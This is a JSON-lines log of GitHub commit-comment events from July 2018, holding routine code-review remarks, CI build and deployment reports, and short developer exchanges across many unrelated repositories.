{"id":"7965360279","type":"CommitCommentEvent","actor":{"login":"ruslanstufetulovs"},"repo":{"name":"Dmitrijs1984/RandomAndSum"},"payload":{"comment":{"id":29708128,"position":22,"line":22,"path":"src/com/RandomNumbersDemo.java","commit_id":"c04ac435cdcf0d34215da73018551790f8b0305e","created_at":"2018-07-14T07:09:59Z","updated_at":"2018-07-14T07:09:59Z","author_association":"NONE","body":"не забывайте форматировать код (CTRL+ALT+L)"}},"created_at":"2018-07-14T07:09:59Z"}
{"id":"7965361003","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29708130,"position":null,"line":null,"path":null,"commit_id":"47881ab5459b824f53f6a6f90cef7346591de7a8","created_at":"2018-07-14T07:10:37Z","updated_at":"2018-07-14T07:10:37Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (3349 of 3349 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-47881ab5459b824f53f6a6f90cef7346591de7a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-47881ab5459b824f53f6a6f90cef7346591de7a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T07:10:37Z"}
{"id":"7965361536","type":"CommitCommentEvent","actor":{"login":"myousefi62"},"repo":{"name":"myousefi62/myousefi62.github.io"},"payload":{"comment":{"id":29708131,"position":3,"line":1,"path":"CNAME","commit_id":"25198f9f4a0213e03e6c6afdbe0ad910d5256fdb","created_at":"2018-07-14T07:11:00Z","updated_at":"2018-07-14T07:11:00Z","author_association":"OWNER","body":"ادرس فیک می باشد"}},"created_at":"2018-07-14T07:11:00Z"}
{"id":"7965362926","type":"CommitCommentEvent","actor":{"login":"mmlinford"},"repo":{"name":"FINRAOS/JTAF-ExtWebDriver"},"payload":{"comment":{"id":29708136,"position":null,"line":null,"path":null,"commit_id":"5aa3269282174298b26259d9a9c42241a082fcc2","created_at":"2018-07-14T07:12:13Z","updated_at":"2018-07-14T07:12:13Z","author_association":"COLLABORATOR","body":"Thanks for fixing it :-). Let me know if there's something that does need to get merged."}},"created_at":"2018-07-14T07:12:13Z"}
{"id":"7965363741","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29708137,"position":null,"line":null,"path":null,"commit_id":"548825b5d7d31248df9d7d5550b11c8570a686bf","created_at":"2018-07-14T07:13:00Z","updated_at":"2018-07-14T07:13:00Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 35](https://teamcity.otenv.com/viewLog.html?buildId=8931131&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **FAILURE**\nSummary: Exit code 137 (new) Build time: 00:12:40"}},"created_at":"2018-07-14T07:13:00Z"}
{"id":"7965365171","type":"CommitCommentEvent","actor":{"login":"jaumeortola"},"repo":{"name":"apertium/apertium-cat"},"payload":{"comment":{"id":29708141,"position":20,"line":24749,"path":"apertium-cat.cat.dix","commit_id":"0b70f706c4a9e9d650269c4ad8cf8451854c0904","created_at":"2018-07-14T07:14:15Z","updated_at":"2018-07-14T07:14:15Z","author_association":"COLLABORATOR","body":"En alguns diccionaris aquestes formes ni tan sols apareixen; en altres, sí. Suposo que es pot fer servir si es fa la concordança del participi: \"N'han calgudes tres (de cadires)\". És l'únic cas que em ve al cap. En tot cas, és molt rar.  "}},"created_at":"2018-07-14T07:14:15Z"}
{"id":"7965365708","type":"CommitCommentEvent","actor":{"login":"hiteshgupta259"},"repo":{"name":"hiteshgupta259/hello-world"},"payload":{"comment":{"id":29708142,"position":null,"line":null,"path":null,"commit_id":"f468ab1d72b969770f46e7db6d1d73d61e66c685","created_at":"2018-07-14T07:14:47Z","updated_at":"2018-07-14T07:14:47Z","author_association":"OWNER","body":"commit chane"}},"created_at":"2018-07-14T07:14:47Z"}
{"id":"7965366697","type":"CommitCommentEvent","actor":{"login":"mikegfisher"},"repo":{"name":"cucumber/docs.cucumber.io"},"payload":{"comment":{"id":29708146,"position":null,"line":null,"path":null,"commit_id":"8edffb604e7b92608103e3ee3583c1d8328f3576","created_at":"2018-07-14T07:15:43Z","updated_at":"2018-07-14T07:15:43Z","author_association":"CONTRIBUTOR","body":"Nice 👍"}},"created_at":"2018-07-14T07:15:43Z"}
{"id":"7965366773","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29708147,"position":null,"line":null,"path":null,"commit_id":"47881ab5459b824f53f6a6f90cef7346591de7a8","created_at":"2018-07-14T07:15:48Z","updated_at":"2018-07-14T07:15:48Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-47881ab5459b824f53f6a6f90cef7346591de7a8-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-14T07:15:48Z"}
{"id":"7965370217","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29708152,"position":null,"line":null,"path":null,"commit_id":"f49d9383604b3922f43ded65291539b2cd40fc8e","created_at":"2018-07-14T07:18:54Z","updated_at":"2018-07-14T07:18:54Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - i386-Windows-7-VisualStudio-14: OK (2752 of 2941 tests passed, 88 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 221 tests had: EIO diffs.\n * 76 tests had: ESO big diffs.\n * 174 tests had: Table big diffs.\n * 166 tests had: ESO small diffs.\n * 102 tests had: MTR small diffs.\n * 35 tests had: MTR big diffs.\n * 21 tests had: ERR diffs.\n * 39 tests had: Table small diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 625\n * Failed: 1\n\nregression Test Summary\n * Passed: 436\n * Failed: 188\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f49d9383604b3922f43ded65291539b2cd40fc8e-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f49d9383604b3922f43ded65291539b2cd40fc8e-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.57%25-yellow.png)</a> \n"}},"created_at":"2018-07-14T07:18:54Z"}
{"id":"7965370914","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29708153,"position":null,"line":null,"path":null,"commit_id":"2d3fd59e049a0b3a334ad47465ef4c392864dd29","created_at":"2018-07-14T07:19:32Z","updated_at":"2018-07-14T07:19:32Z","author_association":"OWNER","body":"@twinaphex my previous commit about fixNaN was bogus. You should revert it. "}},"created_at":"2018-07-14T07:19:32Z"}
{"id":"7965371720","type":"CommitCommentEvent","actor":{"login":"jwise"},"repo":{"name":"moroso/cpu"},"payload":{"comment":{"id":29708155,"position":29,"line":29,"path":"sim/Cmod_MCPU_MEM_walk.cpp","commit_id":"38947b6b27bb2e3ccbceb15a6d3906125597e896","created_at":"2018-07-14T07:20:15Z","updated_at":"2018-07-14T07:20:15Z","author_association":"CONTRIBUTOR","body":"A Python programmer was here"}},"created_at":"2018-07-14T07:20:15Z"}
{"id":"7965381633","type":"CommitCommentEvent","actor":{"login":"JonoAugustine"},"repo":{"name":"mainstringargs/Unofficial-Robinhood-Api"},"payload":{"comment":{"id":29708172,"position":null,"line":null,"path":null,"commit_id":"9fa373675bbc2cd0ebacdd7c5199e0781c67e34b","created_at":"2018-07-14T07:29:03Z","updated_at":"2018-07-14T07:29:03Z","author_association":"NONE","body":"Looks good! Would you like to contribute to the AMPro fork and help make it better?"}},"created_at":"2018-07-14T07:29:03Z"}
{"id":"7965383355","type":"CommitCommentEvent","actor":{"login":"xianmin"},"repo":{"name":"xianmin/hugo-theme-jane"},"payload":{"comment":{"id":29708181,"position":null,"line":null,"path":null,"commit_id":"b8c640535806cb23a75fc163f26278d351b4ba8e","created_at":"2018-07-14T07:30:32Z","updated_at":"2018-07-14T07:30:32Z","author_association":"OWNER","body":"There is a confusing problem.\r\nBefore changing, the `zh-cn` site menu url was broken.\r\n\r\nFor example:\r\n\r\n```toml\r\nbaseURL = \"http://en.xianmin.org/hugo-theme-jane/\"\r\n...\r\n[[languages.zh-cn.menu.main]]https://github.com/xianmin/hugo-theme-jane/blob/b8c640535806cb23a75fc163f26278d351b4ba8e/layouts/partials/header.html#L34\r\n  name = \"主页\"\r\n  weight = 10\r\n  identifier = \"home\"\r\n  url = \"/zh-cn/\"\r\n```\r\n\r\nThe menu url of the \"主页\" item should be `http://en.xianmin.org/hugo-theme-jane/zh-cn/`. But the result is `http://en.xianmin.org/zh-cn/hugo-theme-jane/zh-cn/` .\r\n\r\nThen, I change the `url = \"zh-cn/\"`, it works right now.\r\n\r\nIf your site is `baseURL = \"http://example.com/\"`, is a root url, your menu url should be work both `relURL` or `absURL`.\r\n\r\n\r\nOur menu link in source file is:\r\nhttps://github.com/xianmin/hugo-theme-jane/blob/b8c640535806cb23a75fc163f26278d351b4ba8e/layouts/partials/header.html#L34\r\n\r\nI am not sure if this is a problem with hugo."}},"created_at":"2018-07-14T07:30:32Z"}
{"id":"7965384740","type":"CommitCommentEvent","actor":{"login":"prettyjose"},"repo":{"name":"prettyjose/problem_solving"},"payload":{"comment":{"id":29708185,"position":null,"line":null,"path":null,"commit_id":"f62cc1b1fcb1c426261c37f97cae7f66f26c297c","created_at":"2018-07-14T07:31:37Z","updated_at":"2018-07-14T07:31:37Z","author_association":"OWNER","body":"Change package headers from 'trees2.trees' to 'trees' "}},"created_at":"2018-07-14T07:31:37Z"}
{"id":"7965387180","type":"CommitCommentEvent","actor":{"login":"eoghan2t9"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29708191,"position":null,"line":null,"path":null,"commit_id":"4e56af5ab481918764a373cf73b39843916f801b","created_at":"2018-07-14T07:33:37Z","updated_at":"2018-07-14T07:33:37Z","author_association":"NONE","body":"Will this fix the issues with mt7603 kernel panics?"}},"created_at":"2018-07-14T07:33:37Z"}
{"id":"7965387328","type":"CommitCommentEvent","actor":{"login":"steelbrain"},"repo":{"name":"npm/cli"},"payload":{"comment":{"id":29708192,"position":4,"line":106,"path":"test/tap/builtin-config.js","commit_id":"b03e157afcd96fbcdbf300cd97916c5acb6ef27f","created_at":"2018-07-14T07:33:45Z","updated_at":"2018-07-14T07:33:45Z","author_association":"NONE","body":"Looks like a git merge conflict. Is this intentional?"}},"created_at":"2018-07-14T07:33:45Z"}
{"id":"7965389410","type":"CommitCommentEvent","actor":{"login":"ondrej-fabry"},"repo":{"name":"bmuschko/link-verifier"},"payload":{"comment":{"id":29708197,"position":25,"line":20,"path":"file/file.go","commit_id":"ed13880b9dcaf748fa479fc926c46f21b7a8e93d","created_at":"2018-07-14T07:35:46Z","updated_at":"2018-07-14T07:35:46Z","author_association":"NONE","body":"What's up with this condition? 😮"}},"created_at":"2018-07-14T07:35:46Z"}
{"id":"7965392214","type":"CommitCommentEvent","actor":{"login":"jwise"},"repo":{"name":"moroso/cpu"},"payload":{"comment":{"id":29708201,"position":70,"line":70,"path":"rtl/mc/MCPU_MEM_dtlb.v","commit_id":"38947b6b27bb2e3ccbceb15a6d3906125597e896","created_at":"2018-07-14T07:38:29Z","updated_at":"2018-07-14T07:38:29Z","author_association":"CONTRIBUTOR","body":"consider suffixes like \"_0a\", \"_1a\" \"_2a\" to mean \"for this cycle\", \"for the previous cycle\", \"the one before that\"; or \"_active\" for \"I'm working on this right now\", rather than \"_old\""}},"created_at":"2018-07-14T07:38:29Z"}
{"id":"7965392776","type":"CommitCommentEvent","actor":{"login":"jwise"},"repo":{"name":"moroso/cpu"},"payload":{"comment":{"id":29708202,"position":70,"line":70,"path":"rtl/mc/MCPU_MEM_dtlb.v","commit_id":"38947b6b27bb2e3ccbceb15a6d3906125597e896","created_at":"2018-07-14T07:39:00Z","updated_at":"2018-07-14T07:39:00Z","author_association":"CONTRIBUTOR","body":"consider initializing with 'x' instead of '0' to avoid reset surprises"}},"created_at":"2018-07-14T07:39:00Z"}
{"id":"7965393024","type":"CommitCommentEvent","actor":{"login":"jwise"},"repo":{"name":"moroso/cpu"},"payload":{"comment":{"id":29708203,"position":59,"line":59,"path":"rtl/mc/MCPU_MEM_dtlb.v","commit_id":"38947b6b27bb2e3ccbceb15a6d3906125597e896","created_at":"2018-07-14T07:39:15Z","updated_at":"2018-07-14T07:39:15Z","author_association":"CONTRIBUTOR","body":"plumb in a reset for this"}},"created_at":"2018-07-14T07:39:15Z"}
{"id":"7965393390","type":"CommitCommentEvent","actor":{"login":"jwise"},"repo":{"name":"moroso/cpu"},"payload":{"comment":{"id":29708204,"position":79,"line":79,"path":"rtl/mc/MCPU_MEM_dtlb.v","commit_id":"38947b6b27bb2e3ccbceb15a6d3906125597e896","created_at":"2018-07-14T07:39:35Z","updated_at":"2018-07-14T07:39:35Z","author_association":"CONTRIBUTOR","body":"having a 'clk' pin is okay"}},"created_at":"2018-07-14T07:39:35Z"}
{"id":"7965393955","type":"CommitCommentEvent","actor":{"login":"gengwb"},"repo":{"name":"liyiqiang2016/channel-pruning-for-mobilenet_ssd"},"payload":{"comment":{"id":29708206,"position":null,"line":null,"path":null,"commit_id":"01f5a70cd918a5b76629d1a4e50faad19bf9931a","created_at":"2018-07-14T07:40:06Z","updated_at":"2018-07-14T07:40:06Z","author_association":"NONE","body":"????"}},"created_at":"2018-07-14T07:40:06Z"}
{"id":"7965395174","type":"CommitCommentEvent","actor":{"login":"borisyankov"},"repo":{"name":"zulip/zulip-mobile"},"payload":{"comment":{"id":29708209,"position":null,"line":null,"path":null,"commit_id":"e8e6a244a62fb7d85526011fb2918d53ff486e6c","created_at":"2018-07-14T07:41:11Z","updated_at":"2018-07-14T07:41:11Z","author_association":"CONTRIBUTOR","body":"Why do you think this will improve performance?\r\nIn this case, it will make it slower, though just a little bit.\r\n\r\nHave a look at what a selector looks like:\r\nhttps://github.com/reduxjs/reselect/blob/fda697a5b21959d55123bb8a3fdb6192f9cdc984/src/index.js#L21\r\n\r\nThe original version of the code is extremely simple and amounts to:\r\n * accessing an object property `state.nav.index`\r\n * getting the object that maps to that property in `state.nav.routes`\r\n * getting the property `routeName` of that object\r\n\r\nThis is a very fast operation."}},"created_at":"2018-07-14T07:41:11Z"}
{"id":"7965395736","type":"CommitCommentEvent","actor":{"login":"borisyankov"},"repo":{"name":"zulip/zulip-mobile"},"payload":{"comment":{"id":29708211,"position":null,"line":null,"path":null,"commit_id":"e8e6a244a62fb7d85526011fb2918d53ff486e6c","created_at":"2018-07-14T07:41:42Z","updated_at":"2018-07-14T07:41:42Z","author_association":"CONTRIBUTOR","body":"This is one of the reasons we don't want everything memoized (using createSelector)."}},"created_at":"2018-07-14T07:41:42Z"}
{"id":"7965398076","type":"CommitCommentEvent","actor":{"login":"mkskumaran"},"repo":{"name":"arunprasad1/mkskumaran.github.io"},"payload":{"comment":{"id":29708216,"position":null,"line":null,"path":null,"commit_id":"8c01b12de6ca8960160a10eb152c9c7bbf25abb1","created_at":"2018-07-14T07:43:51Z","updated_at":"2018-07-14T07:43:51Z","author_association":"COLLABORATOR","body":"change this code"}},"created_at":"2018-07-14T07:43:51Z"}
{"id":"7965398644","type":"CommitCommentEvent","actor":{"login":"2604150210"},"repo":{"name":"webturing/JudgeOnline"},"payload":{"comment":{"id":29708218,"position":null,"line":null,"path":null,"commit_id":"2a9fcc6202e9b961c371d590a0e45aa31f1ba0ea","created_at":"2018-07-14T07:44:23Z","updated_at":"2018-07-14T07:44:23Z","author_association":"COLLABORATOR","body":"这两处的增添使得可以在题目页面提交代码时，能够正确查询出当前题目是否在已进行的竞赛中，如果在竞赛中，则将提交结果与状态加入当前竞赛中"}},"created_at":"2018-07-14T07:44:23Z"}
{"id":"7965398922","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":29708220,"position":null,"line":null,"path":null,"commit_id":"4d8c4e9280b64bb1f8f7e7cae239167f8e2d0932","created_at":"2018-07-14T07:44:40Z","updated_at":"2018-07-14T07:44:40Z","author_association":"MEMBER","body":"#1105 #1107 #1121 #1124 #1126"}},"created_at":"2018-07-14T07:44:40Z"}
{"id":"7965399094","type":"CommitCommentEvent","actor":{"login":"JaimeBadiola"},"repo":{"name":"Sulasdeli/GetOldTweets-python"},"payload":{"comment":{"id":29708222,"position":null,"line":null,"path":null,"commit_id":"9a4095accd05f86d26c003be661d06c981a0028e","created_at":"2018-07-14T07:44:50Z","updated_at":"2018-07-14T07:44:50Z","author_association":"NONE","body":"I get an error in line 16\r\nWhat is the argument you are calling with sys.argv[1]. \r\nwhen i run this it says:\r\n  File \"googleSentimentAnalysis.py\", line 16, in <module>\r\n    file = open(sys.argv[1])\r\nIndexError: list index out of range"}},"created_at":"2018-07-14T07:44:50Z"}
{"id":"7965400155","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29708227,"position":63,"line":42,"path":"contracts/Remittance.sol","commit_id":"2407d12858299f342f1021371e2a4da9b1e8f5a7","created_at":"2018-07-14T07:45:46Z","updated_at":"2018-07-14T07:45:46Z","author_association":"OWNER","body":"Hi @xavierlepretre I got your point. One solution I can think of is to convert the `claimRemittance()` procedure and take `otpX` as an argument along with `payID` which will become. This way, arguments exposed on `sendRemittance()` are not reused and are not guessed as well in claim procedure. I'll update the push the changes for your review. Thanks again."}},"created_at":"2018-07-14T07:45:46Z"}
{"id":"7965400852","type":"CommitCommentEvent","actor":{"login":"teamraw"},"repo":{"name":"lettuce-oreo/android_device_yu_lettuce"},"payload":{"comment":{"id":29708231,"position":null,"line":null,"path":null,"commit_id":"23d00e79a73f276079bac52645dfbf371e1259c5","created_at":"2018-07-14T07:46:22Z","updated_at":"2018-07-14T07:46:22Z","author_association":"CONTRIBUTOR","body":"are u mad ?\r\ni give u correct lines but if u dont know even copy paste then what i do \r\nthen only one option is left ehich is that leave development and github too.\r\n"}},"created_at":"2018-07-14T07:46:22Z"}
{"id":"7965401071","type":"CommitCommentEvent","actor":{"login":"teamraw"},"repo":{"name":"lettuce-oreo/android_device_yu_lettuce"},"payload":{"comment":{"id":29708232,"position":null,"line":null,"path":null,"commit_id":"23d00e79a73f276079bac52645dfbf371e1259c5","created_at":"2018-07-14T07:46:33Z","updated_at":"2018-07-14T07:46:33Z","author_association":"CONTRIBUTOR","body":"why are u blaming me??"}},"created_at":"2018-07-14T07:46:33Z"}
{"id":"7965401417","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29708233,"position":87,"line":66,"path":"contracts/Remittance.sol","commit_id":"2407d12858299f342f1021371e2a4da9b1e8f5a7","created_at":"2018-07-14T07:46:55Z","updated_at":"2018-07-14T07:46:55Z","author_association":"OWNER","body":"It is to introduce expiry for the transaction."}},"created_at":"2018-07-14T07:46:55Z"}
{"id":"7965403315","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29708237,"position":93,"line":72,"path":"contracts/Remittance.sol","commit_id":"2407d12858299f342f1021371e2a4da9b1e8f5a7","created_at":"2018-07-14T07:48:52Z","updated_at":"2018-07-14T07:48:52Z","author_association":"OWNER","body":"Sure Sir. Agreed. I have added new function in the latest code commit."}},"created_at":"2018-07-14T07:48:52Z"}
{"id":"7965403886","type":"CommitCommentEvent","actor":{"login":"rjs1197"},"repo":{"name":"rjs1197/training"},"payload":{"comment":{"id":29708238,"position":null,"line":null,"path":null,"commit_id":"f2fdca331762dfa0820430ea2dd3c1bdc7fa1c23","created_at":"2018-07-14T07:49:25Z","updated_at":"2018-07-14T07:49:25Z","author_association":"OWNER","body":"plz make the README file by uppercase."}},"created_at":"2018-07-14T07:49:25Z"}
{"id":"7965405475","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29708244,"position":null,"line":null,"path":null,"commit_id":"dd67a1dedd0e56edaa7ceb8188a1f2e4bff5c984","created_at":"2018-07-14T07:50:50Z","updated_at":"2018-07-14T07:50:50Z","author_association":"NONE","body":"### Results for event id: 39700636-3a32-4a55-b6e2-b23b1fc808e4\n<details><summary>DockerServerless : Deploy to Lambda (d7f9ab) Execution completed.</summary>\n<p>\n\n**output tail (274 lines total):**\n\n```\n...\nstage: dev\nregion: ap-southeast-2\nstack: sample-http-dev\napi keys:\n  None\nendpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev/sample-http\nfunctions:\n  sample-http: sample-http-dev-sample-http\n\nStack Outputs\nSampleDashhttpLambdaFunctionArn: arn:aws:lambda:ap-southeast-2:347186442473:function:sample-http-dev-sample-http\nApiGatewayRestApiRootResource: q643s5bj1a\nApiGatewayRestApi: yeajzvl29j\nServiceEndpoint: https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev\nServerlessDeploymentBucketName: io.zoto.serverless.dev\nServerlessAliasReference: REFERENCE\n\nDone in 68.08s.\nApiGateway Endpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/master/sample-http\nSuccess:  sample-http\nALL DEPLOYS SUCCESSFUL\n>>> packaging deployment output: 39700636-3a32-4a55-b6e2-b23b1fc808e4-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/39700636-3a32-4a55-b6e2-b23b1fc808e4-output.tar.gz\n{\n    \"ETag\": \"\\\"16d9b5f0e47d5c71a8c9ee41e8f895ed\\\"\"\n}\nExecution time was 134 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-14T07:50:50Z"}
{"id":"7965405619","type":"CommitCommentEvent","actor":{"login":"MicathonTracker"},"repo":{"name":"Micathon3/artificial-entertainment"},"payload":{"comment":{"id":29708246,"position":null,"line":null,"path":null,"commit_id":"f2ada1e95169b4473b7a9dc72deedd1007ac1c79","created_at":"2018-07-14T07:50:56Z","updated_at":"2018-07-14T07:50:56Z","author_association":"NONE","body":"@StellarDoor5319, you have been rewarded **5.1 XP** for creating this commit. Keep up the good work! You now have a total of 5.1 XP."}},"created_at":"2018-07-14T07:50:56Z"}
{"id":"7965405652","type":"CommitCommentEvent","actor":{"login":"lvtaode"},"repo":{"name":"lvtaode/vue-backend"},"payload":{"comment":{"id":29708247,"position":25,"line":24,"path":"src/components/FoodList.vue","commit_id":"596e898a61d582e4383f7802ec774cccaeda6330","created_at":"2018-07-14T07:50:58Z","updated_at":"2018-07-14T07:50:58Z","author_association":"OWNER","body":"方式等发"}},"created_at":"2018-07-14T07:50:58Z"}
{"id":"7965405810","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29708248,"position":null,"line":null,"path":null,"commit_id":"47881ab5459b824f53f6a6f90cef7346591de7a8","created_at":"2018-07-14T07:51:06Z","updated_at":"2018-07-14T07:51:06Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (2055 of 2055 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-47881ab5459b824f53f6a6f90cef7346591de7a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-47881ab5459b824f53f6a6f90cef7346591de7a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-47881ab5459b824f53f6a6f90cef7346591de7a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.09%25-green.png)</a>\n"}},"created_at":"2018-07-14T07:51:06Z"}
{"id":"7965406745","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29708253,"position":null,"line":null,"path":null,"commit_id":"f71a5798f9ba97c76d9daf8e3a3e60b7f5f3bb6f","created_at":"2018-07-14T07:52:00Z","updated_at":"2018-07-14T07:52:00Z","author_association":"OWNER","body":"```\r\n#Downtiser\r\nplayer={\r\n    'noob':{\r\n        'performance':{\r\n            '40+':['nobrain','monkey'],\r\n            '45+':['idiot','camper']\r\n\r\n        },\r\n        'factor':{\r\n            '40+':['chicken','pig'],\r\n            '45+':['snipe','off line']\r\n        }\r\n    },\r\n    'ordinary':{\r\n        'performance':{\r\n            '50+':['okay','cat'],\r\n            '55+':['useful','wolf']\r\n        },\r\n        'factor':{\r\n            '50+':['common operation','active'],\r\n            '55+':['effective','sometimes powerful']\r\n        }\r\n\r\n    },\r\n    'powerful':{\r\n        'performance':{\r\n            '60+':['powerful','tiger'],\r\n            '65+':['legendary','lion']\r\n        },\r\n        'factor':{\r\n            '60+':['control the match','always powerful'],\r\n            '65+':['carry the game','god']\r\n        }\r\n    }\r\n\r\n\r\n}\r\n\r\nwhile True:\r\n\r\n    for i in player:\r\n        print('\\033[32;1m>>>\\033[0m',i)\r\n    user_choice=input('what kind of players do you want to look through:')\r\n    while user_choice in player:\r\n        for i in player[user_choice]:\r\n            print('\\033[32;1m>>>\\033[0m',i)\r\n        user_choice2=input('what option do you want to look through:')\r\n        while user_choice2 in player[user_choice]:\r\n            for i in player[user_choice][user_choice2]:\r\n                print('\\033[32;1m>>>\\033[0m',i)\r\n            user_choice3=input('what range of winrate do you want to know:')\r\n            while user_choice3 in player[user_choice][user_choice2]:\r\n                for i in player[user_choice][user_choice2][user_choice3]:\r\n                    print('\\033[32;1m>>>\\033[0m',i)\r\n                user_choice4=input('input q to quit or input b to back:')\r\n                if user_choice4=='q':\r\n                    print(\"\\033[32;1mquit successfully!\\033[0m\")\r\n                    exit()\r\n                elif user_choice4=='b':\r\n                    break\r\n                else:\r\n                    print('\\033[31;1mwrong input!\\033[0m')\r\n                    continue\r\n            else:\r\n                if user_choice3=='b':\r\n                    break\r\n                elif user_choice3=='q':\r\n                    print(\"\\033[32;1mquit successfully!\\033[0m\")\r\n                    exit()\r\n                else:\r\n\r\n                    print('\\033[31;1mwrong input!\\033[0m')\r\n                    continue\r\n        else:\r\n            if user_choice2=='b':\r\n                break\r\n            elif user_choice2=='q':\r\n                print(\"\\033[32;1mquit successfully!\\033[0m\")\r\n                exit()\r\n            else:\r\n                print('\\033[31;1mwrong input!\\033[0m')\r\n                continue\r\n    else:\r\n        if user_choice=='b':\r\n            print('\\033[31;1mthere is no more menu! please input again\\033[0m')\r\n            continue\r\n        elif user_choice=='q':\r\n            print(\"\\033[32;1mquit successfully!\\033[0m\")\r\n            exit()\r\n        else:\r\n            print('\\033[31;1mwrong input!\\033[0m')\r\n            continue\r\n\r\n```"}},"created_at":"2018-07-14T07:52:00Z"}
{"id":"7965409662","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29708254,"position":12,"line":9,"path":"test/Remittance.js","commit_id":"2407d12858299f342f1021371e2a4da9b1e8f5a7","created_at":"2018-07-14T07:54:41Z","updated_at":"2018-07-14T07:54:41Z","author_association":"OWNER","body":"Go it. Fixed."}},"created_at":"2018-07-14T07:54:41Z"}
{"id":"7965410726","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29708255,"position":15,"line":12,"path":"test/Remittance.js","commit_id":"2407d12858299f342f1021371e2a4da9b1e8f5a7","created_at":"2018-07-14T07:55:40Z","updated_at":"2018-07-14T07:55:40Z","author_association":"OWNER","body":"Sure. Changed. "}},"created_at":"2018-07-14T07:55:40Z"}
{"id":"7965411197","type":"CommitCommentEvent","actor":{"login":"ivasic"},"repo":{"name":"ivasic/abna"},"payload":{"comment":{"id":29708257,"position":null,"line":null,"path":null,"commit_id":"f593203178a99c392fb9486fcf24472df57bc6aa","created_at":"2018-07-14T07:56:05Z","updated_at":"2018-07-14T07:56:05Z","author_association":"OWNER","body":"@djc sure, I'll send a PR. The change you proposed sounds absolutely reasonable, though it breaks backwards compatibility. If we were to do that, I'd definitely make `iban` mandatory otherwise existing (old) code would confuse `iban` for `last_key` causing runtime bugs. "}},"created_at":"2018-07-14T07:56:05Z"}
